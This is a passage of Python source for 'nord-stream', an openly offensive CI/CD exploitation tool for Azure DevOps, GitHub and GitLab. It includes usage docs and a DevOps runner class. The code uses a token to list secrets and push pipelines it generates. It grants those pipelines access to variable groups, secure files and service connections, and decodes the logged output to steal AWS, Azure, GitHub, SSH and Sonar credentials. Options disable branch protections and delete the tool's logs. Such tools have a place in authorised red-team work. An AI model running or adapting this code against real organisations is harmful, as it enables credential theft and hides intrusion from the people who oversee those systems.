nord-stream devops [options] --token <pat> --org <org> --yaml <yaml> --project <project> [--write-filter --no-clean --branch-name <name> --pipeline-name <name> --pipeline-file <filename> --repo-name <name> --sleep <int>]
nord-stream devops [options] --token <pat> --org <org> --build-yaml <output> [--build-type <type>] [--pool-name <name>] [--os linux|windows]
nord-stream devops [options] --token <pat> --org <org> --clean-logs [--project <project>]
nord-stream devops [options] --token <pat> --org <org> --list-projects [--write-filter]
nord-stream devops [options] --token <pat> --org <org> --list-repositories [--project <project>]
nord-stream devops [options] --token <pat> --org <org> (--list-secrets [--project <project> --write-filter] | --list-users)
nord-stream devops [options] --token <pat> --org <org> --describe-token
nord-stream devops [options] --token <pat> --list-orgs
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
--ignore-cert Allow insecure server connections
Commit:
--user <user> User used to commit
--email <email> Email address used commit
--key-id <id> GPG primary key ID to sign commits
args:
--token <pat> Azure DevOps personal token or JWT
--org <org> Org name
-p, --project <project> Run on selected project (can be a file)
-y, --yaml <yaml> Run arbitrary job
--clean-logs Delete all pipeline created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean pipeline logs (default false)
--list-projects List all projects.
--list-repositories List all repositories.
--list-secrets List all secrets.
--list-users List all users.
--write-filter Filter projects where current user has write or admin access.
--build-yaml <output> Create a pipeline yaml file with default configuration.
--build-type <type> Type used to generate the yaml file can be: default, azurerm, github, aws, sonar, ssh
--describe-token Display information on the token
--branch-name <name> Use specific branch name for deployment.
--pipeline-name <name> Use pipeline for deployment.
--pipeline-file <filename> Pipeline filename (default: azure-pipelines.yml).
--repo-name <name> Use specific repo for deployment.
--pool-name <name> Use specific pool name for deployment. This value will be set as pool name in the YAML file
--default-agent <name> Use specific default agent pool for deployment. This value will be used as Default agent pool for the pipeline
--os [linux | windows] The agent's OS where the pipeline will be run. Default to linux
--sleep <int> Sleep this amount of time before retrieving pipeline result (15s by default)
Exctraction:
--extract <list> Extract following secrets [vg,sf,gh,az,aws,sonar,ssh]
--no-extract <list> Don't extract following secrets [vg,sf,gh,az,aws,sonar,ssh]
Examples:
List all secrets from all projects
$ nord-stream devops --token "$PAT" --org myorg --list-secrets
Dump all secrets from all projects
$ nord-stream devops --token "$PAT" --org myorg
Authors: @hugow @0hexit
"""
from docopt import docopt
from nordstream.cicd.devops import DevOps
from nordstream.core.devops.devops import DevOpsRunner
from nordstream.git import Git
from nordstream.utils.log import NordStreamLog, logger
from nordstream.utils.devops import listOrgs
def start(argv):
args = docopt(__doc__, argv=argv)
if args["--verbose"]:
NordStreamLog.setVerbosity(verbose=1)
if args["--debug"]:
NordStreamLog.setVerbosity(verbose=2)
logger.debug(args)
if args["--list-orgs"]:
listOrgs(args["--token"])
return
# check validity of the token
if not DevOps.checkToken(args["--token"], args["--org"], (not args["--ignore-cert"])):
logger.critical("Invalid token or org.")
# devops setup
devops = DevOps(args["--token"], args["--org"], (not args["--ignore-cert"]))
if args["--output-dir"]:
devops.outputDir = args["--output-dir"] + "/"
if args["--branch-name"]:
devops.branchName = args["--branch-name"]
if args["--pipeline-name"]:
devops.pipelineName = args["--pipeline-name"]
if args["--repo-name"]:
devops.repoName = args["--repo-name"]
if args["--default-agent"]:
devops.defaultAgentPool = args["--default-agent"]
if args["--sleep"]:
devops.sleepTime = args["--sleep"]
devopsRunner = DevOpsRunner(devops)
if args["--key-id"]:
Git.KEY_ID = args["--key-id"]
if args["--user"]:
Git.USER = args["--user"]
if args["--email"]:
Git.EMAIL = args["--email"]
if args["--pipeline-file"]:
devopsRunner.pipelineFilename = args["--pipeline-file"]
if args["--yaml"]:
devopsRunner.yaml = args["--yaml"]
if args["--write-filter"]:
devopsRunner.writeAccessFilter = args["--write-filter"]
if args["--pool-name"]:
devopsRunner.poolName = args["--pool-name"]
if args["--os"]:
devopsRunner.os = args["--os"].lower()
if args["--extract"] and args["--no-extract"]:
logger.critical("Can't use both --service-connection and --no-service-connection option.")
if args["--extract"]:
devopsRunner.parseExtractList(args["--extract"])
if args["--no-extract"]:
devopsRunner.parseExtractList(args["--no-extract"], False)
if args["--no-clean"]:
devopsRunner.cleanLogs = not args["--no-clean"]
if args["--describe-token"]:
devopsRunner.describeToken()
return
devopsRunner.getProjects(args["--project"])
# logic
if args["--list-projects"]:
devopsRunner.listDevOpsProjects()
elif args["--list-repositories"]:
devopsRunner.listDevOpsRepositories()
elif args["--list-users"]:
devopsRunner.listDevOpsUsers()
elif args["--list-secrets"]:
devopsRunner.listProjectSecrets()
elif args["--clean-logs"]:
devopsRunner.manualCleanLogs()
elif args["--build-yaml"]:
devopsRunner.output = args["--build-yaml"]
devopsRunner.createYaml(args["--build-type"])
else:
devopsRunner.runPipeline()
================================================
FILE: nordstream/commands/github.py
================================================
"""
CICD pipeline exploitation tool
Usage:
nord-stream github [options] --token <ghp> --org <org> [--repo <repo> --no-repo --no-env --no-org --env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> --yaml <yaml> --repo <repo> [--env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> ([--clean-logs] [--clean-branch-policy]) [--repo <repo> --branch-name <name>]
nord-stream github [options] --token <ghp> --org <org> --build-yaml <filename> --repo <repo> [--build-type <type> --env <env>]
nord-stream github [options] --token <ghp> --org <org> --azure-tenant-id <tenant> --azure-client-id <client> [--repo <repo> --env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> --aws-role <role> --aws-region <region> [--repo <repo> --env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> --list-protections [--repo <repo> --branch-name <name> --disable-protections]
nord-stream github [options] --token <ghp> --org <org> --list-secrets [--repo <repo> --no-repo --no-env --no-org]
nord-stream github [options] --token <ghp> [--org <org>] --list-repos [--write-filter]
nord-stream github [options] --token <ghp> --describe-token
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
Commit:
--user <user> User used to commit
--email <email> Email address used commit
--key-id <id> GPG primary key ID to sign commits
args:
--token <ghp> Github personal token
--org <org> Org name
-r, --repo <repo> Run on selected repo (can be a file)
-y, --yaml <yaml> Run arbitrary job
--clean-logs Delete all logs created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean workflow logs (default false)
--clean-branch-policy Remove branch policy, can be used with --repo. This operation is done by default but can be manually triggered.
--build-yaml <filename> Create a pipeline yaml file with all secrets.
--build-type <type> Type used to generate the yaml file can be: default, azureoidc, awsoidc
--env <env> Specify env for the yaml file creation.
--no-repo Don't extract repo secrets.
--no-env Don't extract environnments secrets.
--no-org Don't extract organization secrets.
--azure-tenant-id <tenant> Identifier of the Azure tenant associated with the application having federated credentials (OIDC related).
--azure-subscription-id <subscription> Identifier of the Azure subscription associated with the application having federated credentials (OIDC related).
--azure-client-id <client> Identifier of the Azure application (client) associated with the application having federated credentials (OIDC related).
--aws-role <role> AWS role to assume (OIDC related).
--aws-region <region> AWS region (OIDC related).
--list-protections List all protections.
--list-repos List all repos.
--list-secrets List all secrets.
--disable-protections Disable the branch protection rules (needs admin rights)
--write-filter Filter repo where current user has write or admin access.
--force Don't check environment and branch protections.
--branch-name <name> Use specific branch name for deployment.
--describe-token Display information on the token
Examples:
List all secrets from all repositories
$ nord-stream github --token "$GHP" --org myorg --list-secrets
Dump all secrets from all repositories and try to disable branch protections
$ nord-stream github --token "$GHP" --org myorg --disable-protections
Authors: @hugow @0hexit
"""
from docopt import docopt
from nordstream.cicd.github import GitHub
from nordstream.core.github.github import GitHubWorkflowRunner
from nordstream.utils.log import logger, NordStreamLog
from nordstream.git import Git
def start(argv):
args = docopt(__doc__, argv=argv)
if args["--verbose"]:
NordStreamLog.setVerbosity(verbose=1)
if args["--debug"]:
NordStreamLog.setVerbosity(verbose=2)
logger.debug(args)
# check validity of the token
if not GitHub.checkToken(args["--token"]):
logger.critical("Invalid token.")
# github setup
gitHub = GitHub(args["--token"])
if args["--output-dir"]:
gitHub.outputDir = args["--output-dir"] + "/"
if args["--org"]:
gitHub.org = args["--org"]
if args["--branch-name"]:
gitHub.branchName = args["--branch-name"]
logger.info(f'Using branch: "{gitHub.branchName}"')
if args["--key-id"]:
Git.KEY_ID = args["--key-id"]
if args["--user"]:
Git.USER = args["--user"]
if args["--email"]:
Git.EMAIL = args["--email"]
# runner setup
gitHubWorkflowRunner = GitHubWorkflowRunner(gitHub, args["--env"])
if args["--no-repo"]:
gitHubWorkflowRunner.extractRepo = not args["--no-repo"]
if args["--no-env"]:
gitHubWorkflowRunner.extractEnv = not args["--no-env"]
if args["--no-org"]:
gitHubWorkflowRunner.extractOrg = not args["--no-org"]
if args["--yaml"]:
gitHubWorkflowRunner.yaml = args["--yaml"]
if args["--disable-protections"]:
gitHubWorkflowRunner.disableProtections = args["--disable-protections"]
if args["--write-filter"]:
gitHubWorkflowRunner.writeAccessFilter = args["--write-filter"]
if args["--force"]:
gitHubWorkflowRunner.forceDeploy = args["--force"]
if args["--aws-role"] or args["--azure-tenant-id"]:
gitHubWorkflowRunner.exploitOIDC = True
if args["--azure-tenant-id"]:
gitHubWorkflowRunner.tenantId = args["--azure-tenant-id"]
if args["--azure-subscription-id"]:
gitHubWorkflowRunner.subscriptionId = args["--azure-subscription-id"]
if args["--azure-client-id"]:
gitHubWorkflowRunner.clientId = args["--azure-client-id"]
if args["--aws-role"]:
gitHubWorkflowRunner.role = args["--aws-role"]
if args["--aws-region"]:
gitHubWorkflowRunner.region = args["--aws-region"]
if args["--no-clean"]:
gitHubWorkflowRunner.cleanLogs = not args["--no-clean"]
# logic
if args["--describe-token"]:
gitHubWorkflowRunner.describeToken()
elif args["--list-repos"]:
gitHubWorkflowRunner.getRepos(args["--repo"])
gitHubWorkflowRunner.listGitHubRepos()
elif args["--list-secrets"]:
gitHubWorkflowRunner.getRepos(args["--repo"])
gitHubWorkflowRunner.listGitHubSecrets()
elif args["--build-yaml"]:
gitHubWorkflowRunner.writeAccessFilter = True
gitHubWorkflowRunner.workflowFilename = args["--build-yaml"]
gitHubWorkflowRunner.createYaml(args["--repo"], args["--build-type"])
# Cleaning
elif args["--clean-logs"] or args["--clean-branch-policy"]:
gitHubWorkflowRunner.getRepos(args["--repo"])
if args["--clean-logs"]:
gitHubWorkflowRunner.manualCleanLogs()
if args["--clean-branch-policy"]:
gitHubWorkflowRunner.manualCleanBranchPolicy()
elif args["--list-protections"]:
gitHubWorkflowRunner.writeAccessFilter = True
gitHubWorkflowRunner.getRepos(args["--repo"])
gitHubWorkflowRunner.checkBranchProtections()
else:
gitHubWorkflowRunner.writeAccessFilter = True
gitHubWorkflowRunner.getRepos(args["--repo"])
gitHubWorkflowRunner.start()
================================================
FILE: nordstream/commands/gitlab.py
================================================
"""
CICD pipeline exploitation tool
Usage:
nord-stream gitlab [options] --token <pat> (--list-secrets | --list-protections) [--project <project> --group <group> --no-project --no-group --no-instance --write-filter --sleep <seconds>]
nord-stream gitlab [options] --token <pat> ( --list-groups | --list-projects | --list-users | --list-runners) [--project <project> --group <group> --write-filter]
nord-stream gitlab [options] --token <pat> --yaml <yaml> --project <project> [--project-path <path> --no-clean]
nord-stream gitlab [options] --token <pat> --clean-logs [--project <project>]
nord-stream gitlab [options] --token <pat> --describe-token
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
--url <gitlab_url> Gitlab URL [default: https://gitlab.com]
--ignore-cert Allow insecure server connections
--membership Limit by projects that the current user is a member of
Commit:
--user <user> User used to commit
--email <email> Email address used commit
--key-id <id> GPG primary key ID to sign commits
args:
--token <pat> GitLab personal access token or _gitlab_session cookie
--project <project> Run on selected project (can be a file / project id)
--group <group> Run on selected group (can be a file)
--list-secrets List all secrets.
--list-protections List branch protection rules.
--list-projects List all projects.
--list-groups List all groups.
--list-users List all users.
--list-runners List runners through project jobs (unprivileged, but non-exhaustive).
--write-filter Filter repo where current user has developer access or more.
--no-project Don't extract project secrets.
--no-group Don't extract group secrets.
--no-instance Don't extract instance secrets.
-y, --yaml <yaml> Run arbitrary job
--branch-name <name> Use specific branch name for deployment.
--clean-logs Delete all pipeline logs created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean pipeline logs (default false)
--describe-token Display information on the token
--sleep <seconds> Time to sleep in seconds between each secret request.
--project-path <path> Local path of the git folder.
Examples:
Dump all secrets
$ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --list-secrets
Deploy the custom pipeline on the master branch
$ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --yaml exploit.yaml --branch master --project 'group/projectname'
Authors: @hugow @0hexit
"""
from docopt import docopt
from nordstream.cicd.gitlab import GitLab
from nordstream.core.gitlab.gitlab import GitLabRunner
from nordstream.utils.log import logger, NordStreamLog
from nordstream.git import Git
def start(argv):
args = docopt(__doc__, argv=argv)
if args["--verbose"]:
NordStreamLog.setVerbosity(verbose=1)
if args["--debug"]:
NordStreamLog.setVerbosity(verbose=2)
logger.debug(args)
# check validity of the token
if not GitLab.checkToken(args["--token"], args["--url"], (not args["--ignore-cert"])):
logger.critical('Invalid token or the token doesn\'t have the "api" scope.')
# gitlab setup
gitlab = GitLab(args["--url"], args["--token"], (not args["--ignore-cert"]))
if args["--output-dir"]:
gitlab.outputDir = args["--output-dir"] + "/"
gitLabRunner = GitLabRunner(gitlab)
if args["--key-id"]:
Git.KEY_ID = args["--key-id"]
if args["--user"]:
Git.USER = args["--user"]
if args["--email"]:
Git.EMAIL = args["--email"]
if args["--branch-name"]:
gitlab.branchName = args["--branch-name"]
logger.info(f'Using branch: "{gitlab.branchName}"')
# config
if args["--write-filter"]:
gitLabRunner.writeAccessFilter = args["--write-filter"]
if args["--no-project"]:
gitLabRunner.extractProject = not args["--no-project"]
if args["--no-group"]:
gitLabRunner.extractGroup = not args["--no-group"]
if args["--no-instance"]:
gitLabRunner.extractInstance = not args["--no-instance"]
if args["--no-clean"]:
gitLabRunner.cleanLogs = not args["--no-clean"]
if args["--yaml"]:
gitLabRunner.yaml = args["--yaml"]
if args["--sleep"]:
gitLabRunner.sleepTime = args["--sleep"]
if args["--project-path"]:
gitLabRunner.localPath = args["--project-path"]
# logic
if args["--describe-token"]:
gitLabRunner.describeToken()
elif args["--list-projects"]:
gitLabRunner.getProjects(args["--project"], membership=args["--membership"])
gitLabRunner.listGitLabProjects()
elif args["--list-protections"]:
gitLabRunner.getProjects(args["--project"], membership=args["--membership"])
gitLabRunner.listBranchesProtectionRules()
elif args["--list-groups"]:
gitLabRunner.getGroups(args["--group"])
gitLabRunner.listGitLabGroups()
elif args["--list-users"]:
gitLabRunner.listGitLabUsers()
elif args["--list-runners"]:
if gitLabRunner.extractProject:
gitLabRunner.getProjects(args["--project"], membership=args["--membership"])
if gitLabRunner.extractGroup:
gitLabRunner.getGroups(args["--group"])
gitLabRunner.listGitLabRunners()
elif args["--list-secrets"]:
if gitLabRunner.extractProject:
gitLabRunner.getProjects(args["--project"], membership=args["--membership"])
if gitLabRunner.extractGroup:
gitLabRunner.getGroups(args["--group"])
gitLabRunner.listGitLabSecrets()
elif args["--clean-logs"]:
gitLabRunner.getProjects(args["--project"], membership=args["--membership"])
gitLabRunner.manualCleanLogs()
else:
gitLabRunner.getProjects(args["--project"], strict=True, membership=args["--membership"])
gitLabRunner.runPipeline()
================================================
FILE: nordstream/core/devops/devops.py
================================================
import base64
import logging
import subprocess
import time
from os import chdir, makedirs
from os.path import exists, realpath
from nordstream.git import Git
from nordstream.utils.errors import DevOpsError, GitError, RepoCreationError
from nordstream.utils.helpers import isAllowed
from nordstream.utils.log import logger
from nordstream.yaml.devops import DevOpsPipelineGenerator
class DevOpsRunner:
_cicd = None
_extractVariableGroups = True
_extractSecureFiles = True
_extractAzureServiceconnections = True
_extractGitHubServiceconnections = True
_extractAWSServiceconnections = True
_extractSonarServiceconnections = True
_extractSSHServiceConnections = True
_yaml = None
_writeAccessFilter = False
_poolName = None
_os = "linux"
_pipelineFilename = "azure-pipelines.yml"
_output = None
_cleanLogs = True
_resType = {"default": 0, "doubleb64": 1, "github": 2, "azurerm": 3}
_pushedCommitsCount = 0
_branchAlreadyExists = False
_allowedTypes = ["azurerm", "github", "aws", "sonarqube", "ssh"]
def __init__(self, cicd):
self._cicd = cicd
self.__createLogDir()
@property
def extractVariableGroups(self):
return self._extractVariableGroups
@extractVariableGroups.setter
def extractVariableGroups(self, value):
self._extractVariableGroups = value
@property
def extractSecureFiles(self):
return self._extractSecureFiles
@extractSecureFiles.setter
def extractSecureFiles(self, value):
self._extractSecureFiles = value
@property
def extractAzureServiceconnections(self):
return self._extractAzureServiceconnections
@extractAzureServiceconnections.setter
def extractAzureServiceconnections(self, value):
self._extractAzureServiceconnections = value
@property
def extractGitHubServiceconnections(self):
return self._extractGitHubServiceconnections
@extractGitHubServiceconnections.setter
def extractGitHubServiceconnections(self, value):
self._extractGitHubServiceconnections = value
@property
def extractAWSServiceconnections(self):
return self._extractAWSServiceconnections
@extractAWSServiceconnections.setter
def extractAWSServiceconnections(self, value):
self._extractAWSServiceconnections = value
@property
def extractSonarerviceconnections(self):
return self._extractSonarServiceconnections
@extractSonarerviceconnections.setter
def extractSonarerviceconnections(self, value):
self._extractSonarServiceconnections = value
@property
def extractSSHServiceConnections(self):
return self._extractSSHServiceConnections
@extractSSHServiceConnections.setter
def extractSSHServiceConnections(self, value):
self._extractSSHServiceConnections = value
@property
def output(self):
return self._output
@output.setter
def output(self, value):
self._output = value
@property
def cleanLogs(self):
return self._cleanLogs
@cleanLogs.setter
def cleanLogs(self, value):
self._cleanLogs = value
@property
def yaml(self):
return self._yaml
@yaml.setter
def yaml(self, value):
self._yaml = realpath(value)
@property
def pipelineFilename(self):
return self._pipelineFilename
@pipelineFilename.setter
def pipelineFilename(self, value):
self._pipelineFilename = value
@property
def writeAccessFilter(self):
return self._writeAccessFilter
@writeAccessFilter.setter
def writeAccessFilter(self, value):
self._writeAccessFilter = value
@property
def poolName(self):
return self._poolName
@poolName.setter
def poolName(self, value):
self._poolName = value
@property
def os(self):
return self._os
@os.setter
def os(self, value):
self._os = value
def __createLogDir(self):
self._cicd.outputDir = realpath(self._cicd.outputDir) + "/azure_devops"
makedirs(self._cicd.outputDir, exist_ok=True)
def listDevOpsProjects(self):
logger.info("Listing all projects:")
for p in self._cicd.projects:
name = p.get("name")
logger.raw(f"- {name}\n", level=logging.INFO)
def listDevOpsRepositories(self):
logger.info("Listing all repositories:")
for p in self._cicd.projects:
project_name = p.get("name")
for r in self._cicd.listRepositories(project_name):
name = r.get("name")
logger.raw(f"- {project_name}/{name}\n", level=logging.INFO)
def listDevOpsUsers(self):
logger.info("Listing all users:")
for p in self._cicd.listUsers():
origin = p.get("origin")
displayName = p.get("displayName")
mailAddress = p.get("mailAddress")
res = f"- {displayName}"
if mailAddress != "":
res += f" / {mailAddress}"
res += f" ({origin})\n"
logger.raw(res, level=logging.INFO)
def getProjects(self, project):
if project:
if exists(project):
with open(project, "r") as file:
for project in file:
self._cicd.addProject(project.strip())
else:
self._cicd.addProject(project)
else:
self._cicd.listProjects()
if self._writeAccessFilter:
self._cicd.filterWriteProjects()
if len(self._cicd.projects) == 0:
if self._writeAccessFilter:
logger.critical("No project with write access found.")
else:
logger.critical("No project found.")
def listProjectSecrets(self):
logger.info("Listing secrets")
for project in self._cicd.projects:
projectName = project.get("name")
projectId = project.get("id")
logger.info(f'"{projectName}" secrets')
self.__displayProjectVariableGroupsSecrets(projectId)
self.__displayProjectSecureFiles(projectId)
self.__displayServiceConnections(projectId)
logger.empty_line()
def __displayProjectVariableGroupsSecrets(self, project):
try:
secrets = self._cicd.listProjectVariableGroupsSecrets(project)
except DevOpsError as e:
logger.error(e)
else:
if len(secrets) != 0:
for variableGroup in secrets:
logger.info(f"Variable group: \"{variableGroup.get('name')}\"")
for sec in variableGroup.get("variables"):
logger.raw(f"\t- {sec}\n", logging.INFO)
def __displayProjectSecureFiles(self, project):
try:
secureFiles = self._cicd.listProjectSecureFiles(project)
except DevOpsError as e:
logger.error(e)
else:
if secureFiles:
for sf in secureFiles:
logger.info(f'Secure file: "{sf["name"]}"')
def __displayServiceConnections(self, projectId):
try:
serviceConnections = self._cicd.listServiceConnections(projectId)
except DevOpsError as e:
logger.error(e)
else:
if len(serviceConnections) != 0:
logger.info("Service connections:")
for sc in serviceConnections:
scType = sc.get("type")
scName = sc.get("name")
logger.raw(f"\t- {scName} ({scType})\n", logging.INFO)
def __checkSecrets(self, project):
projectId = project.get("id")
projectName = project.get("name")
secrets = 0
if (
self._extractAzureServiceconnections
or self._extractGitHubServiceconnections
or self._extractAWSServiceconnections
or self._extractSonarServiceconnections
or self._extractSSHServiceConnections
):
try:
secrets += len(self._cicd.listServiceConnections(projectId))
except DevOpsError as e:
logger.error(f"Error while listing service connection: {e}")
if self._extractVariableGroups:
try:
secrets += len(self._cicd.listProjectVariableGroupsSecrets(projectId))
except DevOpsError as e:
logger.error(f"Error while listing variable groups: {e}")
if self._extractSecureFiles:
try:
secrets += len(self._cicd.listProjectSecureFiles(projectId))
except DevOpsError as e:
logger.error(f"Error while listing secure files: {e}")
if secrets == 0:
logger.info(f'No secrets found for project "{projectName}" / "{projectId}"')
return False
return True
def createYaml(self, pipelineType):
pipelineGenerator = DevOpsPipelineGenerator()
if pipelineType == "github":
pipelineGenerator.generatePipelineForGitHub("#FIXME", self._poolName, self._os)
elif pipelineType == "azurerm":
pipelineGenerator.generatePipelineForAzureRm("#FIXME", self._poolName, self._os)
elif pipelineType == "aws":
pipelineGenerator.generatePipelineForAWS("#FIXME", self._poolName, self._os)
elif pipelineType == "sonar":
pipelineGenerator.generatePipelineForSonar("#FIXME", self._poolName, self._os)
elif pipelineType == "ssh":
pipelineGenerator.generatePipelineForSSH("#FIXME", self._poolName, self._os)
else:
pipelineGenerator.generatePipelineForSecretExtraction({"name": "", "variables": ""}, self._poolName, self._os)
logger.success("YAML file: ")
pipelineGenerator.displayYaml()
pipelineGenerator.writeFile(self._output)
def __extractPipelineOutput(self, projectId, resType=0, resultsFilename="secrets.txt"):
with open(
f"{self._cicd.outputDir}/{self._cicd.org}/{projectId}/{self._fileName}",
"rb",
) as output:
try:
if resType == self._resType["doubleb64"]:
pipelineResults = self.__doubleb64(output)
elif resType == self._resType["github"]:
pipelineResults = self.__extractGitHubResults(output)
elif resType == self._resType["azurerm"]:
pipelineResults = self.__azureRm(output)
elif resType == self._resType["default"]:
pipelineResults = output.read()
else:
logger.exception("Invalid type checkout: _resType")
except:
output.seek(0)
pipelineResults = output.read()
logger.success("Output:")
logger.raw(pipelineResults, logging.INFO)
with open(f"{self._cicd.outputDir}/{self._cicd.org}/{projectId}/{resultsFilename}", "ab") as file:
file.write(pipelineResults)
@staticmethod
def __extractGitHubResults(output):
decoded = DevOpsRunner.__doubleb64(output)
for line in decoded.split(b"\n"):
if b"AUTHORIZATION" in line:
try:
return base64.b64decode(line.split(b" ")[-1]) + b"\n"
except Exception as e:
logger.error(e)
return None
@staticmethod
def __doubleb64(output):
# well it's working
data = output.readlines()[-3].split(b" ")[1]
return base64.b64decode(base64.b64decode(data))
@staticmethod
def __azureRm(output):
# well it's working
data = output.readlines()[-3].split(b" ")[1]
return base64.b64decode(base64.b64decode(data))
def __launchPipeline(self, project, pipelineId, pipelineGenerator):
logger.verbose(f"Launching pipeline.")
pipelineGenerator.writeFile(f"./{self._pipelineFilename}")
pushOutput = Git.gitPush(self._cicd.branchName)
pushOutput.wait()
try:
if b"Everything up-to-date" in pushOutput.communicate()[1].strip():
logger.error("Error when pushing code: Everything up-to-date")
logger.warning(
"Your trying to push the same code on an existing branch, modify the yaml file to push it."
)
elif pushOutput.returncode != 0:
logger.error("Error when pushing code:")
logger.raw(pushOutput.communicate()[1], logging.INFO)
else:
self._pushedCommitsCount += 1
logger.raw(pushOutput.communicate()[1])
# manual trigger because otherwise is difficult to get the right runId
run = self._cicd.runPipeline(project, pipelineId)
self.__checkRunErrors(run)
runId = run.get("id")
pipelineStatus = self._cicd.waitPipeline(project, pipelineId, runId)
if pipelineStatus == "succeeded":
logger.success("Pipeline has successfully terminated.")
return runId
elif pipelineStatus == "failed":
self.__displayFailureReasons(project, runId)
return None
except Exception as e:
logger.error(e)
finally:
pass
def __displayFailureReasons(self, projectId, runId):
logger.error("Workflow failure:")
for reason in self._cicd.getFailureReason(projectId, runId):
logger.error(f"{reason}")
def __extractVariableGroupsSecrets(self, projectId, pipelineId):
logger.verbose(f"Getting variable groups secrets")
try:
variableGroups = self._cicd.listProjectVariableGroupsSecrets(projectId)
except DevOpsError as e:
logger.error(e)
else:
if len(variableGroups) > 0:
for variableGroup in variableGroups:
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForSecretExtraction(variableGroup, self._poolName, self._os)
logger.verbose(
f'Checking (and modifying) pipeline permissions for variable group: "{variableGroup["name"]}"'
)
if not self._cicd.authorizePipelineForResourceAccess(
projectId, pipelineId, variableGroup, "variablegroup"
):
continue
variableGroupName = variableGroup.get("name")
logger.info(f'Extracting secrets for variable group: "{variableGroupName}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["doubleb64"])
logger.empty_line()
else:
logger.info("No variable groups found")
def __extractSecureFiles(self, projectId, pipelineId):
logger.verbose(f"Getting secure files")
try:
secureFiles = self._cicd.listProjectSecureFiles(projectId)
except DevOpsError as e:
logger.error(e)
else:
if secureFiles:
for secureFile in secureFiles:
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForSecureFileExtraction(secureFile["name"], self._poolName)
logger.verbose(
f'Checking (and modifying) pipeline permissions for the secure file: "{secureFile["name"]}"'
)
if not self._cicd.authorizePipelineForResourceAccess(
projectId, pipelineId, secureFile, "securefile"
):
continue
logger.info(f'Extracting secure file: "{secureFile["name"]}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
date = time.strftime("%Y-%m-%d_%H-%M-%S")
safeSecureFilename = "".join(
[c for c in secureFile["name"] if c.isalpha() or c.isdigit() or c in (" ", ".")]
).strip()
self.__extractPipelineOutput(
projectId,
self._resType["doubleb64"],
f"pipeline_{date}_secure_file_{safeSecureFilename}",
)
logger.empty_line()
else:
logger.info("No secure files found")
def __extractGitHubSecrets(self, projectId, pipelineId, sc):
endpoint = sc.get("name")
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForGitHub(endpoint, self._poolName, self._os)
logger.info(f'Extracting secrets for GitHub: "{endpoint}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["github"])
logger.empty_line()
def __extractAzureRMSecrets(self, projectId, pipelineId, sc):
scheme = sc.get("authorization").get("scheme").lower()
if scheme == "serviceprincipal":
name = sc.get("name")
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForAzureRm(name, self._poolName, self._os)
logger.info(f'Extracting secrets for AzureRM: "{name}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["azurerm"])
logger.empty_line()
else:
logger.error(f"Unsupported scheme: {scheme}")
def __extractAWSSecrets(self, projectId, pipelineId, sc):
scheme = sc.get("authorization").get("scheme").lower()
if scheme == "usernamepassword":
name = sc.get("name")
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForAWS(name, self._poolName, self._os)
logger.info(f'Extracting secrets for AWS: "{name}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["doubleb64"])
logger.empty_line()
else:
logger.error(f"Unsupported scheme: {scheme}")
def __extractSonarSecrets(self, projectId, pipelineId, sc):
endpoint = sc.get("name")
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForSonar(endpoint, self._poolName, self._os)
logger.info(f'Extracting secrets for Sonar: "{endpoint}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["doubleb64"])
logger.empty_line()
def __extractSSHSecrets(self, projectId, pipelineId, sc):
endpoint = sc.get("name")
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForSSH(endpoint, self._poolName, self._os)
logger.info(f'Extracting secrets for ssh: "{endpoint}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["doubleb64"])
logger.empty_line()
def __extractServiceConnectionsSecrets(self, projectId, pipelineId):
try:
serviceConnections = self._cicd.listServiceConnections(projectId)
except DevOpsError as e:
logger.error(e)
else:
for sc in serviceConnections:
scType = sc.get("type").lower()
if scType in self._allowedTypes:
logger.verbose(
f'Checking (and modifying) pipeline permissions for the service connection: "{sc["name"]}"'
)
if not self._cicd.authorizePipelineForResourceAccess(projectId, pipelineId, sc, "endpoint"):
continue
